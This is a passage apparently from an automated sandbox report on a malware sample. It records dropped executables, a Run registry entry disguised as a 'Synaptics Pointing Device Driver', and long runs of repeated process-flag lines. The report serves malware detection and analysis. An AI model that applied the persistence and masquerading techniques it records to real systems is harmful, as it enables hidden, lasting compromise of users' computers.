                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_073CC184 push esp; iretd 4_2_073CC999
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_07CA1563 push ss; retf 0007h4_2_07CA156A
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_07CA5F75 push eax; retf 0007h4_2_07CA5F76
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_07C8C184 push esp; iretd 4_2_07C8C999
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_07C8C99A push eax; iretd 4_2_07C8C9B9
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 4_2_07CA719D pushad ; retf 0007h4_2_07CA719E

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files to the document folder of the user
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup.dllJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxupdate.dllJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dsetup32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8EBB.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCX8506.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\._cache_file.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\Synaptics\RCX8506.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dsetup.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8E7C.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET8EBB.tmpJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Jump to dropped file
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010022FF LocalFree,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcmpiA,lstrcmpiA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,lstrcpyA,lstrcpyA,GetShortPathNameA,wsprintfA,lstrcmpiA,lstrlenA,lstrlenA,lstrlenA,LocalAlloc,wsprintfA,LocalAlloc,GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,2_2_010022FF
                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
